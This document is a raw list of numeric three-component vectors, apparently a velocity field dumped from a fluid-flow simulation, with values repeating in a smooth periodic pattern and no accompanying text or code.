(0.0463740130567 0.464275707624 0)
(0.0517276162886 0.462369649877 0)
(0.0567518921607 0.46009260517 0)
(0.0615665737497 0.457772313931 0)
(0.0662842834669 0.455413523681 0)
(0.0709434723352 0.452951021797 0)
(0.0755652847242 0.45030917648 0)
(0.0801524564334 0.447407548172 0)
(0.0846995629867 0.444159743948 0)
(0.0891923793685 0.440460074046 0)
(0.0935895087282 0.43618344234 0)
(0.0978859963949 0.431157902488 0)
(0.101940377239 0.425137327642 0)
(0.105812322735 0.417776408647 0)
(0.109101787695 0.40839449984 0)
(0.11196094106 0.395514209198 0)
(0.113065140509 0.370704499689 0)
(0.109318361428 0.330350325106 0)
(0.0995493616823 0.276686257795 0)
(0.083833954826 0.214422757525 0)
(0.0630033480558 0.147904489118 0)
(0.037242709376 0.0813929556793 0)
(0.0067143432843 0.0198934225837 0)
(-0.00043428205162 -0.00154746252339 0)
(1.28336963337e-05 -0.00159825449171 0)
(-7.84910649134e-05 -0.00160869896153 0)
(-8.75563568195e-05 -0.00162293421191 0)
(-8.52778307446e-05 -0.00163490376661 0)
(-8.22926579124e-05 -0.00165569187775 0)
(-7.84407496331e-05 -0.00167039924712 0)
(-7.17098837875e-05 -0.00168452345678 0)
(-6.25398631884e-05 -0.00169538311888 0)
(-5.20637821642e-05 -0.00169196791589 0)
(-4.23822245505e-05 -0.00170030580018 1.83705944597e-29)
(-3.19289376778e-05 -0.00172265917947 0)
(-1.2806812479e-05 -0.00170696887034 0)
(2.81756304761e-05 -0.00337289113525 0)
(5.85463258569e-05 -0.00345997682505 0)
(-4.2528851663e-05 -0.0032234553449 0)
(-5.81250203718e-05 -0.00270077388315 0)
(4.43768981664e-05 -0.00272158517501 0)
(0.000120935336521 -0.00280002739985 0)
(0.000168558600245 -0.00289328794081 0)
(0.000186905528324 -0.00298555971717 0)
(0.000183201832698 -0.00305878092587 0)
(0.00017043704274 -0.00309692182671 0)
(0.000163118536001 -0.00317037501197 0)
(0.000153156538248 -0.00315821316572 0)
(0.00013881149119 -0.00305167386442 0)
(0.000132645252656 -0.00286569364234 0)
(0.000104823280777 -0.0026589052427 0)
(2.68197181277e-05 -0.00234337132079 0)
(-2.24708277919e-06 -0.002031996053 0)
(3.57301420464e-05 -0.001931205342 0)
(8.82158935393e-05 -0.0018917456213 0)
(0.000151272145531 -0.00176008239054 -6.24829469743e-29)
(0.00021503071774 -0.00165667719996 0)
(0.000277531961716 -0.00158839475297 0)
(0.000353269186028 -0.00151520692094 0)
(0.000427767724008 -0.00141216989539 0)
(0.000498401560091 -0.00132162758366 0)
(0.000583916688997 -0.00127603442263 0)
(0.000670352000426 -0.00122127143971 0)
(0.000753451061247 -0.00116773460328 0)
(0.000843173946824 -0.0011457316962 0)
(0.000949624504552 -0.00116335126902 0)
(0.0010488391263 -0.00118485901287 0)
(0.0011628533196 -0.0012457166203 0)
(0.00129642928813 -0.00136606624037 0)
(0.00146922232298 -0.00159141208589 0)
(0.00172772148114 -0.00194903356872 0)
(0.00212911435313 -0.00246143400046 0)
(0.0030742762473 -0.00317835260795 0)
(0.00277458001907 -0.00439009119318 0)
(-0.00751522071872 -0.0461287631386 0)
(-0.0379952625633 0.0181676699128 0)
(0.00445113370178 0.334285556414 0)
(0.016063048123 0.439336997396 0)
(0.0299249196857 0.466922275616 0)
(0.037527001472 0.471551703811 0)
(0.0439502121172 0.470169052906 0)
(0.049228604695 0.467587564153 0)
(0.0541546370611 0.46498827215 0)
(0.0588569051096 0.462503585918 0)
(0.063454185444 0.460055707106 0)
(0.0679916877754 0.457541029335 0)
(0.0724962208163 0.454862815713 0)
(0.0769738232476 0.451926536153 0)
(0.0814236774934 0.448634289509 0)
(0.0858313884013 0.444868283027 0)
(0.0901577972409 0.440491946393 0)
(0.0944004669982 0.435312643646 0)
(0.0984007766935 0.429063107184 0)
(0.102252637581 0.421351228502 0)
(0.105464321447 0.411412242273 0)
(0.108309635444 0.397503315016 0)
(0.109127790105 0.36901326402 0)
(0.104239716206 0.322937626804 0)
(0.0927823732091 0.263057961454 0)
(0.0752231297273 0.195103744906 0)
(0.0523411226712 0.123696865446 0)
(0.0233819263412 0.054198396583 0)
(-0.000278657433415 -0.000542654728864 0)
(-0.000277655044981 -0.00174601545581 0)
(-0.000117394128921 -0.00162684726127 0)
(-0.000124336897723 -0.00162740543949 0)
(-0.000120674393583 -0.00162102282303 0)
(-0.000114213128793 -0.00163529887934 0)
(-0.000106759321874 -0.00165410227141 0)
(-9.94736898669e-05 -0.0016675486297 0)
(-8.97978537963e-05 -0.00168053767801 0)
(-7.71978198744e-05 -0.00169233724852 0)
(-6.46765154567e-05 -0.00170232974419 0)
(-5.01496465312e-05 -0.00170454014365 0)
(-3.15284158395e-05 -0.00171312408237 0)
(-1.06387559123e-05 -0.00168261242451 0)
(2.5781686219e-05 -0.00334497892054 0)
(8.66976521261e-05 -0.00346765312704 0)
(3.1254290539e-05 -0.00339891844422 0)
(2.33452984179e-05 -0.00259175713412 0)
(0.000135386701735 -0.00262335966028 0)
(0.000221252611595 -0.00273399601772 0)
(0.000271333605669 -0.00286230860285 0)
(0.000285533392225 -0.0029861603703 0)
(0.000270175015286 -0.00308914808975 0)
(0.000231513867364 -0.00315802655975 0)
(0.000189802277207 -0.0031649954593 0)
(0.000166190406207 -0.00314995000485 0)
(0.000162914720951 -0.00307179612534 0)
(0.0001700153264 -0.00289256120451 0)
(0.00017418159257 -0.00265147538622 0)
(0.000165038770165 -0.00241014210677 0)
(0.000117488464917 -0.00209056151282 0)
(9.24001839394e-05 -0.00188837892964 0)
(0.00013629741588 -0.00180092678245 0)
(0.00019365906476 -0.00167836455017 0)
(0.000250894956047 -0.00165482409436 0)
(0.00031045474649 -0.001536368259 0)
(0.000385339760156 -0.00140932291865 0)
(0.000457449759177 -0.00131722633364 0)
(0.000542691668322 -0.00126599802262 0)
(0.000625955010283 -0.00118088201168 0)
(0.000714956963915 -0.00111517069846 0)
(0.000818239951746 -0.00108153469734 0)
(0.000922716998951 -0.0010524834519 0)
(0.00103493500024 -0.00103797740778 0)
(0.0011596155458 -0.00105007559502 0)
(0.00132382521553 -0.00110620886776 0)
(0.0014803038493 -0.00118285512681 0)
(0.00173450479882 -0.00135933424297 0)
(0.00206629577754 -0.00158497472849 0)
(0.00254976941711 -0.00185554826393 0)
(0.00354001162953 -0.00212360024728 0)
(0.00263626709468 -0.00232198815288 0)
(0.0060660069614 -0.0683010849048 0)
(-0.00682165760972 -0.0292361025766 0)
(0.0101404640345 0.354641376754 0)
(0.0187234287244 0.452386224901 0)
(0.0299084045315 0.476101186969 0)
(0.0364787458078 0.478303801683 0)
(0.042245996166 0.475705508986 0)
(0.0471341101086 0.472559162797 0)
(0.0517798634842 0.469688656788 0)
(0.0562610036479 0.467065353454 0)
(0.0606704191999 0.464544887912 0)
(0.0650441804982 0.461992168594 0)
(0.0694058323161 0.459291947759 0)
(0.0737596168304 0.456336502518 0)
(0.0781068819441 0.453016258241 0)
(0.0824304541115 0.449201009174 0)
(0.0866945727213 0.444741902244 0)
(0.0908961406794 0.439423369429 0)
(0.0948607432141 0.432957186857 0)
(0.0987194746596 0.424895882314 0)
(0.101871884406 0.414388920625 0)
(0.104752576158 0.399379129329 0)
(0.105274022729 0.366552230903 0)
(0.0990748956437 0.314067436488 0)
(0.0858043123549 0.247571407846 0)
(0.0663241716207 0.17376501391 0)
(0.0409135134496 0.097697611632 0)
(0.00870129105588 0.0268031528991 0)
(-0.000557267154855 -0.00141145190172 0)
(-0.000110846808322 -0.00162734589432 0)
(-0.000167596652416 -0.00161667291262 0)
(-0.000167808774324 -0.00161793451415 0)
(-0.000161343169074 -0.00161802683265 0)
(-0.000152214477368 -0.00162204212317 0)
(-0.000142731099631 -0.00164776103549 0)
(-0.00013140782364 -0.00165960604267 0)
(-0.000117823336729 -0.00166919921045 0)
(-0.000101351288229 -0.00167650433597 0)
(-8.16808532105e-05 -0.00168070047116 0)
(-5.62851121509e-05 -0.00167691764154 0)
(-2.73609640601e-05 -0.00169071110617 0)
(-6.1098537627e-06 -0.0016645222656 0)
(7.46318606728e-06 -0.00329207772847 0)
(0.000110835247661 -0.00340870335918 0)
(0.000161621742749 -0.00351431968211 0)
(0.000134537350957 -0.00247211593989 0)
(0.000247022377046 -0.00251236416209 0)
(0.00034615234738 -0.0026615150324 0)
(0.000395520396491 -0.00283413278409 0)
(0.000399355510148 -0.00299550387597 0)
(0.000368008750603 -0.00312725195414 0)
(0.000312614898488 -0.00321412975474 0)
(0.000246565360427 -0.00324187365112 0)
(0.00019193998081 -0.00318206985065 0)
(0.000166542074378 -0.00302314573013 0)
(0.000173958940866 -0.00285841535829 -1.32714148197e-28)
(0.000207479312535 -0.00264634826593 0)
(0.000252415437398 -0.00239873898292 0)
(0.000261186397141 -0.00218708649633 0)
(0.000217441400406 -0.00191841426437 0)
(0.000204092848946 -0.00172528520943 0)
(0.000234823760844 -0.00166190016149 0)
(0.000284756381246 -0.00156783523797 0)
(0.000349478505163 -0.00143827017365 0)
(0.000408892245122 -0.00132660480951 0)
(0.000487673657485 -0.0012758011294 0)
(0.00056634978905 -0.0011642246526 0)
(0.000660377523092 -0.00108160227563 0)
(0.000762532156869 -0.00103062526631 0)
(0.000863406873679 -0.000970564395196 0)
(0.000974950139451 -0.000923536836718 0)
(0.00111775916203 -0.000914243070477 0)
(0.00126340754838 -0.000910696197754 0)
(0.00143020356432 -0.000925844911879 0)
(0.00160784025776 -0.000968411182516 0)
(0.00188803901691 -0.00107727754159 0)
(0.00222394535795 -0.00118574417914 0)
(0.00266765284898 -0.0012672691665 0)
(0.00349796636906 -0.00124967897381 0)
(0.00212513606947 -0.000994493332061 0)
(0.00990410236523 -0.0677545510732 0)
(1.60224781974e-05 -0.000640673840897 0)
(0.0159431061838 0.363637731281 0)
(0.0226712804994 0.462410002047 0)
(0.0310932161843 0.483420828948 0)
(0.0361567898355 0.483935393058 0)
(0.040994168692 0.480568670422 0)
(0.0453120982848 0.477092879859 0)
(0.049556464 0.474073165424 0)
(0.0537358798554 0.471379951575 0)
(0.0579034035908 0.468830781954 0)
(0.0620775995059 0.466272369079 0)
(0.0662734076863 0.463577262583 0)
(0.0704901399157 0.460627712945 0)
(0.0747298240353 0.457303645168 0)
(0.0789704812469 0.453463113324 0)
(0.0831818725686 0.44894433822 0)
(0.0873559428834 0.443506942593 0)
(0.091306510591 0.436841882204 0)
(0.095201365929 0.428435785852 0)
(0.0983152022669 0.417352973564 0)
(0.101286563621 0.401162135299 0)
(0.101487940678 0.363211526605 0)
(0.0937806911621 0.303595361461 0)
(0.0785946463204 0.230133750495 0)
(0.0568577570704 0.150411380201 0)
(0.0278340627699 0.0699072279225 0)
(-0.000261331152829 -0.000249557405576 0)
(-0.000625388160077 -0.00190704771361 0)
(-0.000293467517425 -0.00164273433047 0)
(-0.000261272001259 -0.00162006041056 0)
(-0.000234313203255 -0.00160986533296 0)
(-0.000216438214834 -0.00160606568018 0)
(-0.00020379853052 -0.00161369099846 0)
(-0.000191105848055 -0.00163534112568 0)
(-0.000172634174115 -0.0016453557088 0)
(-0.000151976978504 -0.00165186536398 0)
(-0.000128512700506 -0.00165601223503 0)
(-0.000100290762845 -0.00165400430217 0)
(-6.8357068348e-05 -0.00164462017674 0)
(-3.6135142883e-05 -0.00165871773028 0)
(-9.59408054885e-06 -0.00166606570285 0)
(-1.06471468422e-05 -0.00328524449269 0)
(0.000143249256656 -0.00315244697735 0)
(0.000308566025862 -0.00354042911948 0)
(0.000259666025932 -0.00241728232469 0)
(0.000386525987518 -0.00238838362452 0)
(0.000504254027891 -0.00259609563534 0)
(0.000545294299412 -0.00283648607705 0)
(0.000528260606315 -0.00305606881916 0)
(0.000473292949582 -0.00323392088869 0)
(0.000394564501663 -0.00335109811124 0)
(0.000307591156013 -0.00337754778349 0)
(0.00023373482124 -0.00329511064899 0)
(0.000186719535822 -0.00311445768996 0)
(0.000183456586671 -0.00285286801227 1.3964896471e-28)
(0.000229977010937 -0.00255028221711 0)
(0.000295544554126 -0.00230867512831 0)
(0.000348684708633 -0.00215321972198 0)
(0.000364123200928 -0.00200695350761 0)
(0.000333486959612 -0.00178456472745 0)
(0.000310165464543 -0.00159657500865 0)
(0.000333793852309 -0.00149596914114 0)
(0.000379306600084 -0.0013824743707 0)
(0.000434815343635 -0.00129545027978 0)
(0.000505891218158 -0.00118529512871 0)
(0.000586134004842 -0.00105953336236 0)
(0.000682801063879 -0.000983157690759 0)
(0.00079443900152 -0.00093092272638 0)
(0.000904073160381 -0.000862545146062 0)
(0.00103015343253 -0.000807240877678 0)
(0.00116025755469 -0.000761188389666 0)
(0.00131734816225 -0.00073864827284 0)
(0.00150349589645 -0.000740950550154 0)
(0.00168375640192 -0.000750382180009 0)
(0.00195330289627 -0.000795161419024 0)
(0.00225629195919 -0.000820655497453 0)
(0.00261371406471 -0.000793847349678 0)
(0.00322437732829 -0.000656590814503 0)
(0.00169927644328 -0.000304027770107 0)
(0.0129775268731 -0.0616463606929 0)
(0.000356607805237 -0.000406476807703 0)
(0.019485111127 0.375522606276 0)
(0.0255921126934 0.470456565395 0)
(0.0322178968885 0.488994932421 0)
(0.0359499392668 0.488393579418 0)
(0.0398676919649 0.484670506192 0)
(0.0435796329286 0.481107003299 0)
(0.0473767546609 0.478076311425 0)
(0.0512131599287 0.47539805145 0)
(0.0551057619583 0.472877744518 0)
(0.0590557602066 0.470357018286 0)
(0.063068511316 0.467703137344 0)
(0.0671378445757 0.464792225815 0)
(0.0712662970517 0.461495490384 0)
(0.0754261436329 0.457660538879 0)
(0.0795959332235 0.453111902151 0)
(0.0837574563179 0.447583052783 0)
(0.0877207366622 0.440743738514 0)
(0.0916851691032 0.432001946112 0)
(0.0947885546371 0.420338330582 0)
(0.0979127839223 0.402870027682 0)
(0.0977437559876 0.358822912909 0)
(0.0882702391781 0.291244069893 0)
(0.0710508103272 0.210460671719 0)
(0.0466618456152 0.125355688266 0)
(0.0122144584214 0.0421476086103 0)
(-0.00072899378996 -0.00127278204745 0)
(-0.000237403832091 -0.00152074965115 0)
(-0.000307489633617 -0.00156724963395 0)
(-0.000311050728351 -0.0015863338788 0)
(-0.000298426644519 -0.00158284767335 0)
(-0.000284047399721 -0.00159216083155 0)
(-0.00026771973637 -0.00160351131192 0)
(-0.000247902592142 -0.00161527571728 0)
(-0.000221138428512 -0.00162220472426 0)
(-0.000191909467204 -0.00162602699975 0)
(-0.000160187696293 -0.00162855525785 0)
(-0.000121752828252 -0.00162249865083 0)
(-8.45149559264e-05 -0.001615721695 0)
(-5.27892930162e-05 -0.00162695254077 0)
(-1.80512271601e-05 -0.00162779834839 0)
(9.37028482727e-06 -0.00323234049567 0)
(0.000177695756274 -0.00276769278381 0)
(0.000405746787598 -0.00357941130035 0)
(0.000412612885999 -0.00234266024257 0)
(0.000591753185255 -0.00220998081131 0)
(0.000724102248256 -0.00244586071249 0)
(0.000748799432202 -0.00268558222942 0)
(0.000692884737674 -0.00285745987559 0)
(0.000596721415433 -0.00296504832799 0)
(0.000473748652953 -0.00302968020268 0)
(0.000339289991859 -0.0030466505391 0)
(0.000226974326485 -0.00301208407275 0)
(0.000166652200553 -0.00290503753399 0)
(0.000181530995301 -0.00271893463877 0)
(0.000263611834921 -0.00248419250556 0)
(0.000359425770727 -0.00227227839387 0)
(0.000421158801789 -0.00209968084882 0)
(0.000444561744201 -0.001935996883 0)
(0.000444747045567 -0.00180907091829 0)
(0.000434190398188 -0.00168955514622 0)
(0.000418009400999 -0.00149901598625 0)
(0.000422166012424 -0.00134093492855 0)
(0.000459330923753 -0.00122711896465 0)
(0.000525516191521 -0.00109851277355 0)
(0.00060606981799 -0.000978286924157 0)
(0.000702069599293 -0.000896983472479 0)
(0.000807502025243 -0.000820731988403 0)
(0.000915482043057 -0.000732087730992 0)
(0.00103946098667 -0.000659023213581 0)
(0.00120258830947 -0.000616804158506 0)
(0.00136369032758 -0.000577604398634 0)
(0.00151930338319 -0.000548301209066 0)
(0.00171220253076 -0.000537417152036 0)
(0.00195866404458 -0.000535723230036 0)
(0.00222264373684 -0.000511980496129 0)
(0.00250360064505 -0.00043994943327 0)
(0.00296897305985 -0.0002847595053 0)
(0.00142112519581 2.21774504463e-07 0)
(0.0140311271038 -0.0538205385999 0)
(0.000599883500229 -0.000103184742312 0)
(0.0218774737184 0.387466372598 0)
(0.0273447154046 0.477313175747 0)
(0.0327417590888 0.493234404221 0)
(0.0354843020567 0.491856971171 0)
(0.0386225163902 0.48806828014 0)
(0.0417764185503 0.484604441655 0)
(0.0451343730528 0.481681601255 0)
(0.0486193404097 0.479098706745 0)
(0.0522234496643 0.476666359067 0)
(0.0559358130862 0.474230532126 0)
(0.0597543607124 0.471658761203 0)
(0.0636690381722 0.468824538899 0)
(0.0676838412988 0.465592175178 0)
(0.071765717004 0.461800407942 0)
(0.0759062510378 0.457258983513 0)
(0.0800712858041 0.451674756251 0)
(0.0840801845798 0.4446950191 0)
(0.0881537187477 0.435635341608 0)
(0.0912923673593 0.423396914697 0)
(0.0946581903574 0.40455171767 0)
(0.0940877052129 0.353218800973 0)
(0.0825342157531 0.276641255879 0)
(0.0626527827977 0.187733988561 0)
(0.0340476567882 0.0969831523214 0)
(0.000503336762753 0.00438089384528 0)
(-0.000912596511229 -0.00194283006868 0)
(-0.000514028023138 -0.00157815722416 0)
(-0.000452383484255 -0.00157720857925 0)
(-0.000410601602064 -0.00157090542585 0)
(-0.000389992591159 -0.00157593113577 0)
(-0.000366583083256 -0.00156491943042 0)
(-0.000344889133751 -0.00158151639889 0)
(-0.00031206248961 -0.00158390945729 0)
(-0.000275108084266 -0.00158702849128 0)
(-0.000235420716307 -0.00158792731184 0)
(-0.000192946275107 -0.00158479126155 0)
(-0.00014590862108 -0.00156701763423 0)
(-0.000105999414605 -0.00157936149443 0)
(-7.01739763264e-05 -0.00159098245071 0)
(-2.5847419965e-05 -0.00158979526765 0)
(0.000145257321995 -0.00320629945527 0)
(0.000252143173451 -0.00244923509922 0)
(0.000496678902352 -0.00359527471028 0)
(0.000568750780194 -0.00197891282539 0)
(0.000846147664239 -0.00198415772813 0)
(0.00100990768167 -0.00233967900496 0)
(0.00108204627798 -0.00278015057613 0)
(0.00102929308102 -0.00315735215897 0)
(0.000950257934485 -0.00352012907293 0)
(0.000847807257297 -0.00386781447312 0)
(0.000705319815201 -0.00402624789804 0)
(0.000552765544669 -0.00387584826423 0)
(0.000437208560869 -0.00344436851273 0)
(0.000409539631704 -0.00288348008714 0)
(0.000442463438584 -0.00237580316887 0)
(0.000485681767248 -0.0020997994602 0)
(0.000523006829165 -0.00201522986288 0)
(0.000523809943569 -0.0019199429193 0)
(0.000506979650251 -0.00179467301418 0)
(0.000499817113482 -0.00165761939521 0)
(0.000498184547375 -0.00152933615202 0)
(0.000494310904684 -0.00138150346494 0)
(0.000511441651555 -0.00120739073087 0)
(0.00054968135476 -0.00102229514494 0)
(0.000615907758268 -0.000886955315218 0)
(0.000694574937946 -0.000782618960955 0)
(0.000813096559556 -0.00070787771196 0)
(0.000931460189244 -0.000614930353955 0)
(0.00106579142715 -0.000531656286559 0)
(0.00120333608454 -0.000461863474444 0)
(0.00134851696355 -0.000410964033254 0)
(0.00150148962018 -0.000365437037239 0)
(0.00169986583718 -0.000330108521628 0)
(0.00192794188059 -0.000300562893614 0)
(0.00216052452557 -0.000252959754414 0)
(0.00238647751547 -0.000172435491421 0)
(0.00274986331047 -4.10006014104e-05 0)
(0.0012649678478 0.000171655552765 0)
(0.0143439964964 -0.0450386523116 0)
(0.000746153179044 4.17537822685e-05 0)
(0.023053072729 0.400050150143 0)
(0.0281565155533 0.483381612371 0)
(0.0325529766573 0.496488345131 0)
(0.034588708887 0.494543863017 0)
(0.0371131411361 0.490874049615 0)
(0.0397886471728 0.487632737816 0)
(0.0427430843406 0.484903988526 0)
(0.0458885920932 0.482481736869 0)
(0.0492041067615 0.480190165384 0)
(0.052673540601 0.477884883281 0)
(0.0562910734541 0.475437319029 0)
(0.0600456967161 0.472720935199 0)
(0.0639444834029 0.469594767951 0)
(0.0679509755919 0.46589031452 0)
(0.0720745302213 0.461401056053 0)
(0.0762590811636 0.455807987379 0)
(0.0803519888635 0.448732988741 0)
(0.0845770728567 0.439385469632 0)
(0.0878118792629 0.426596758155 0)
(0.0915351049004 0.406295937307 0)
(0.0906335221697 0.34629543057 0)
(0.076951434562 0.259727804457 0)
(0.0540999495278 0.162294704994 0)
(0.0175503760931 0.0656141372181 0)
(-0.000550828957876 -0.000829304120179 0)
(-7.44807726115e-05 -0.00147831165119 0)
(-0.000372996858737 -0.00151570652578 0)
(-0.000465789487316 -0.00155652878922 0)
(-0.000487849560567 -0.00155381411567 0)
(-0.000483750073935 -0.00154989662423 0)
(-0.000463630371072 -0.00154858528928 0)
(-0.000431164663546 -0.0015428559133 0)
(-0.000386624254438 -0.00154018670998 0)
(-0.000336788791365 -0.00153984740508 0)
(-0.000283978916642 -0.001538173754 0)
(-0.000228481538135 -0.00153188777206 0)
(-0.000175835992492 -0.00152165265958 0)
(-0.000130710307414 -0.00153668742242 0)
(-8.58782586946e-05 -0.00154348348687 0)
(-3.1761998382e-05 -0.00152049727314 0)
(0.000391196880502 -0.00294771070058 0)
(0.000446147444308 -0.00242146216833 0)
(0.0006152817462 -0.00353338553179 0)
(0.000687648805739 -0.00166968645505 0)
(0.00122299793684 -0.00201956957819 0)
(0.00143493040405 -0.00242002813672 0)
(0.00164304469248 -0.0030825375303 0)
(0.00168807750247 -0.00359433737499 0)
(0.00168569305876 -0.00386435393089 0)
(0.00158734061286 -0.00396066287611 0)
(0.00132770300966 -0.00369687617615 0)
(0.00102841977698 -0.00341104574782 0)
(0.000783840406315 -0.00313454169258 0)
(0.000687449370624 -0.00275633861527 0)
(0.000699010513054 -0.00243325622911 0)
(0.000719917430179 -0.00224761212163 0)
(0.000720655138905 -0.00213988521127 0)
(0.000703557510297 -0.00203338928248 0)
(0.000653270843258 -0.0018678601262 0)
(0.000576777397385 -0.00165853099979 0)
(0.000527390842003 -0.00150813336191 0)
(0.000507489535916 -0.00133884289503 0)
(0.000531664091204 -0.00116062198784 0)
(0.000576952857182 -0.000979302205475 0)
(0.000636832285654 -0.000828163974746 0)
(0.00071919627081 -0.000713520081567 0)
(0.000821877731454 -0.00060267939974 0)
(0.000922356935841 -0.000487229720198 0)
(0.00104764925228 -0.000395534370935 0)
(0.00117180190376 -0.000318730084676 0)
(0.00131547018166 -0.000253054285559 0)
(0.00149190972217 -0.000189625781468 0)
(0.00166119454948 -0.000132021672785 0)
(0.00188156422622 -8.42163145643e-05 0)
(0.00209451551929 -2.75386545021e-05 0)
(0.0022916233897 4.08003336393e-05 0)
(0.00259610808752 0.000124858806054 0)
(0.00119705117833 0.000239010699804 0)
(0.0143075787239 -0.035560829251 0)
(0.000829170700562 0.000177987761818 0)
(0.0232301657829 0.412773988241 0)
(0.0281225829729 0.488757401333 0)
(0.0316647048123 0.49899936288 0)
(0.0332059184945 0.496645224514 0)
(0.0352677076828 0.493204846118 0)
(0.0375471363778 0.490254575833 0)
(0.0401417476404 0.487773395404 0)
(0.0429684862818 0.485558564959 0)
(0.0460019051331 0.483450472538 0)
(0.0492270013829 0.481316476799 0)
(0.0526381938186 0.479033865914 0)
(0.0562269947688 0.476477798313 0)
(0.0600053900451 0.47350352803 0)
(0.0639370376148 0.469936883473 0)
(0.0680535516094 0.465553432405 0)
(0.0722720049254 0.46001069101 0)
(0.0764923082302 0.452899214864 0)
(0.0809113193022 0.443308949356 0)
(0.0843100732887 0.430011500535 0)
(0.0884903316839 0.408176722864 0)
(0.0872832283353 0.337802215366 0)
(0.0711170135347 0.240326714427 0)
(0.0449111925249 0.13533458023 0)
(0.0096045554716 0.0351528747938 0)
(-0.00089043392258 -0.00249311388223 0)
(-0.000379703166205 -0.00182955072936 0)
(-0.000534144664738 -0.00166872553425 0)
(-0.000598244934013 -0.00160835187032 0)
(-0.000619844692391 -0.00157455390593 0)
(-0.000606186883898 -0.00152862892062 0)
(-0.000581432601397 -0.00151440678627 0)
(-0.000534594916375 -0.00149653890796 0)
(-0.000477526634666 -0.00148506025652 0)
(-0.000412457960669 -0.00148090848919 0)
(-0.000343208261879 -0.00147886000128 0)
(-0.000273146700695 -0.00147007188751 0)
(-0.000211702656042 -0.00147202802047 0)
(-0.000154766929651 -0.00148169420405 0)
(-9.84111955053e-05 -0.00149276977488 0)
(-3.46094918858e-05 -0.00145393420278 0)
(0.000297956411129 -0.00204538499658 0)
(0.000841068808064 -0.00330165207504 0)
(0.000940097054821 -0.00353267911839 0)
(0.000668975661536 -0.00123570174267 0)
(0.00113803782452 -0.00149297893648 0)
(0.00151121187393 -0.00199421177679 0)
(0.00205560307237 -0.00290275692763 0)
(0.00239462694828 -0.00333747518695 7.25038548051e-29)
(0.00259819293915 -0.00357410431218 -6.96175368272e-29)
(0.00281735673128 -0.00427667614602 0)
(0.00281043641038 -0.00499355206223 0)
(0.00256338682802 -0.00544851740131 0)
(0.00168673430712 -0.00430289123956 0)
(0.00107191827805 -0.00300941095928 0)
(0.000851231315529 -0.00229858845297 0)
(0.000847169905448 -0.0021062129257 0)
(0.000870629605739 -0.00203522799809 0)
(0.000872062127064 -0.00197630122357 0)
(0.00081664427759 -0.00189281155389 0)
(0.000707769643511 -0.0017833419078 0)
(0.000586483406028 -0.00160401558863 0)
(0.000514945442966 -0.00135310900773 0)
(0.000517412703451 -0.00111550800803 0)
(0.000558334971347 -0.00091045426438 0)
(0.000629436631491 -0.000759834384611 0)
(0.000716311849255 -0.000627787541454 0)
(0.000811468985169 -0.000499637792851 0)
(0.000912185181298 -0.000380649541415 0)
(0.00101581089405 -0.000275033072541 0)
(0.00113615243041 -0.000183967979455 0)
(0.00128312185921 -9.6462226656e-05 0)
(0.00144232603219 -1.41323341493e-05 0)
(0.00160466731421 5.54864241633e-05 0)
(0.00182348310451 0.000123359455985 0)
(0.00203551704403 0.0001858380339 0)
(0.00223406476132 0.000235359108772 0)
(0.00252890054942 0.000260308579524 0)
(0.00120777698755 0.000240955592202 0)
(0.0139462378023 -0.0258958716332 0)
(0.000853586487875 0.000273520657237 0)
(0.0225200204154 0.425358399687 0)
(0.0273255120661 0.493472009643 0)
(0.0301491730597 0.500949882095 0)
(0.0313430888963 0.498317711107 0)
(0.0330634369085 0.495164832632 0)
(0.035018531201 0.492532026578 0)
(0.0372932588162 0.490323145979 0)
(0.0398217195125 0.488344222586 0)
(0.0425800036221 0.486450937851 0)
(0.0455588827471 0.484522342742 0)
(0.0487566019152 0.482442390452 0)
(0.0521705792356 0.480089079396 0)
(0.0558194470405 0.477315536005 0)
(0.0596720917293 0.473943482804 0)
(0.0637856484838 0.469729370769 0)
(0.0680483526926 0.464311544979 0)
(0.072443309571 0.457239567721 0)
(0.0770998013756 0.447475460459 0)
(0.0807582106978 0.433741243262 0)
(0.0855259513462 0.410291159611 0)
(0.0840049807165 0.327284811248 0)
(0.064244868868 0.217409497821 0)
(0.0329143075177 0.10475511019 0)
(-0.000157291809182 0.000338015155713 0)
(-0.000865641119264 -0.00202543045505 0)
(-0.000553272473736 -0.00188190907948 0)
(-0.00068335152998 -0.00176773208248 0)
(-0.000747697508031 -0.00163196148268 0)
(-0.000780777508314 -0.00157068844533 0)
(-0.000765430515857 -0.00151829613449 0)
(-0.000722808271665 -0.00147059839856 0)
(-0.000661697213454 -0.00143828321136 1.75140386919e-30)
(-0.000588127310939 -0.00141649997458 0)
(-0.000503634667748 -0.00140298283283 0)
(-0.000415412339382 -0.0013967407752 0)
(-0.000331660621685 -0.00139372348775 0)
(-0.000257201075805 -0.00140695033493 0)
(-0.000185289930381 -0.00141993461568 0)
(-0.000113851095214 -0.00143195564925 0)
(-3.72743934983e-05 -0.00138473066067 0)
(0.000120271322531 -0.00135526469562 0)
(0.000646493412057 -0.00261311631054 0)
(0.00135063244382 -0.00332985291623 6.60213812831e-29)
(0.000687721903727 -0.0010068558839 0)
(0.000829561833715 -0.000927900398026 0)
(0.00152341862199 -0.00171343785836 0)
(0.00256778952933 -0.00270669381081 0)
(0.00347264033221 -0.00340938952018 0)
(0.00429861137295 -0.0044048346235 0)
(0.00466345037286 -0.00555759733031 0)
(0.00335031506762 -0.00454567759181 0)
(0.00231804832012 -0.00363066063281 0)
(0.00179972335566 -0.00371991118513 0)
(0.00116373120714 -0.00313226344125 0)
(0.000981310087149 -0.0024469222317 0)
(0.00104014127746 -0.00213745083163 0)
(0.00112478657016 -0.00204001547827 0)
(0.00115205322523 -0.00202841145342 0)
(0.00106668518783 -0.00202417885347 0)
(0.000864882093813 -0.00194727573359 0)
(0.000637111493926 -0.00174049246919 0)
(0.000507413999534 -0.00141565030202 0)
(0.000494289602362 -0.00110926510103 0)
(0.000533356367827 -0.000866806076701 0)
(0.000587757888031 -0.000675231322642 0)
(0.000679989393687 -0.000533863522125 0)
(0.000769869926771 -0.000393074242777 0)
(0.000874740732752 -0.000271659256271 0)
(0.000988034811761 -0.000164283922772 0)
(0.00109713291236 -6.01888822339e-05 0)
(0.00122298807262 4.58106627185e-05 0)
(0.00135902372727 0.000148873441207 0)
(0.0015245751988 0.000244054588579 0)
(0.00175121126438 0.000336585543591 0)
(0.00198250401613 0.000412508844523 0)
(0.00221713525749 0.000452674622536 0)
(0.00257395125656 0.000422814014133 0)
(0.00130783208717 0.000206439705467 0)
(0.0135341794799 -0.0167066316395 0)
(0.000830518475218 0.000285506561164 0)
(0.0210135650144 0.437427690478 0)
(0.0258193875708 0.49756655737 0)
(0.0280950233239 0.502520364569 0)
(0.0290436667803 0.499701425998 0)
(0.0305112176541 0.496842360288 0)
(0.0321979521454 0.494517728359 0)
